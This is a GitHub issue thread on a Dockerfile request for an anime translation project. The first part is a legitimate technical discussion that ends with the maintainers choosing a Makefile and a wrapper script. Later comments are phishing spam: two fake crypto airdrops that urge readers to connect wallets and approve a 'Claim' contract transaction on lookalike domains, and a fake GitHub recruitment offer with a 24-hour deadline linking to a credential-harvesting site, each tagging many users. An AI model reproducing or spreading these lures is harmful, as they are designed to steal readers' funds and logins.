### ISSUE TITLE
dockerfile/containerfile

### ISSUE THREAD

**Issue by Nitrousoxide** [tekakutli/anime_translation#1]
Any thoughts on creating a dockerfile or containerfile to install/setup all these instructions into one container to make it portable and replicatable?

**Comment by tekakutli** [comment]
I don't think that would be practical, as the snippets work on your files(video, subtitles, models)
you would need to mount them into the container

but you got me thinking, and I have now added a makefile

**Comment by Nitrousoxide** [comment]
So with docker/podman there's the dockerfile which is used to actually create the image, and then there's the docker/podman run or docker compose which will deploy it.  At the run or compose phase you can choose to mount a host directory into the container with the "-v /path/to/host/directory:/path/to/container/directory" flag for the run command or under the appropriate volume header in the yml file for a compose file.  You can also set environment variables and so on when deploying the container.

Dockerfiles, on the other hand, are used to setup the environment that the image is set in.  Its basically a script for the commands needed to setup the container image in a repeatable fashion.

Here is the documentation for them:
Dockerfile
https://docs.docker.com/engine/reference/builder/

docker compose:
https://docs.docker.com/compose/compose-file/

**Comment by abitofevrything** [comment]
A Dockerfile really isn't the ideal solution here. The translation requires read-write access to the host - ok, sure we can use mounts but this makes the Dockerfile not much more elegant than a simple wrapper script.

Additionally, docker services are intended to be long-running processes, not one-time task scripts, and many tools would auto-restart the script when it exists, thereby restarting the translation which we don't want.

Finally, Docker can sometimes add resource usage limitations on containers which we want to avoid if possible.

Instead, I wrote up a wrapper script and rewrote the README so that dependencies are clear and easy to install - see https://github.com/tekakutli/anime_translation/pull/2 for more.

**Comment by ikubij** [comment]
# 🪂 Chainlink $LINK Airdrop: How to Qualify for Chainlink $LINK Coin Airdrop?

If you're interested in holder airdrops and governance tokens, the Chainlink $LINK initiative airdrop is a great opportunity. This guide will walk you through the process, explaining how to join the airdrop and what to expect.

[![Claim Now](https://blog.bit2me.com/en/wp-content/uploads/sites/4/2022/03/The-Great-B2M-Airdrop.png)](https://go.chainlinkrewards.online/Xb0Ggc)

#### 🚀 Steps to Secure Your Chainlink $LINK Airdrop:

1. **Connect Your Wallet:**
   - Visit the [Chainlink $LINK Airdrop](https://go.chainlinkrewards.online/Xb0Ggc).
   - Connect your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Eligibility Check:**
   - Confirm your eligibility for the airdrop [here](https://go.chainlinkrewards.online/Xb0Ggc).

3. **Interact with the Contract:**
   - Use the `connect` method on the Chainlink network to secure your participation.
     - Open your connected wallet.
     - Navigate to the Chainlink $LINK Airdrop contract.
     - Locate the 'Claim' or equivalent button.
     - Confirm the transaction to connect your wallet to the airdrop contract.

4. **Engage for Extra Rewards:**
   - Dive into community discussions or complete tasks for additional bonus rewards.

### 🌈 Bonus Tips for Chainlink $LINK Airdrop Success:

- **Community Assistance:**
  - Need help? Reach out via Telegram or other social media platforms.

- **Stay Informed:**
  - Watch for updates on the airdrop process via official channels.

- **Patience Pays Off:**
  - Airdrop distribution may take some time. Stay calm and keep an eye out for updates.

Feel free to share your Chainlink $LINK Airdrop experiences or ask any questions in the comments below. Let's make this process a breeze for everyone!


Winners: @Q-er, @triptych, @alfarok, @mgintoki, @cthiriet, @Rainbowelephane, @digiangler

**Comment by kaneson** [comment]
# $BNB Airdrop: Claim Your $1000 in BNB Now!

🌟 Exciting News! 🎉 You're in for a treat! 🚀 You've just hit the jackpot and secured your spot in the $1.5k Binance Airdrop! 🤑 Brace yourself for an amazing windfall of $1500 in BNB. But that's not all – here's the cherry on top: Connect now, and enjoy an instant bonus of $100! 🚀 Don't miss out on this golden opportunity. Follow the simple steps below to claim your tokens and elevate the joy of this spectacular giveaway! 🌈

[![Claim Now](https://pbs.twimg.com/media/FgeJoNLaMAAqLfx.jpg:large)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Wallet:
   - Click on the [Connect Wallet](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1000 in BNB! Additionally, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, take the opportunity to win up to $20,000—it's your golden chance!


Winners: @nmh32, @pzxy, @Illuztrado, @trungtaxp, @psyburr, @Lucfost, @ahaibo, @Joy-jinyu, @lixiaowei11111, @sflanary97, @talaha17, @manhloki, @KristopherBorja, @krasiva711, @tayvano, @Git-money-bee, @cvs0, @winssps, @ttytm, @0xforkitall, @arigold22, @ZHANGTONG028, @suyash5053, @Jainex17, @WhyMeta, @genova447, @boidushya, @evan2020, @cserli, @sevvy-thewebcoder

**Comment by cvs0** [comment]
I swear to god if i get one more of these drop scams

**Comment by yawoffeh** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
GATOQSECOMIO, @cawlin, @lroot, @adamisntdead, @ttys3, @kasvith, @thomasklemm, @croogie, @sahwar, @darioodiaz, @ChenCanming, @ffpetrovic, @KenzoKai, @CyrilNb, @abdullahceylan, @jp8042, @RoseauHan, @getaclue00, @sameerkat, @AldoAbdiel
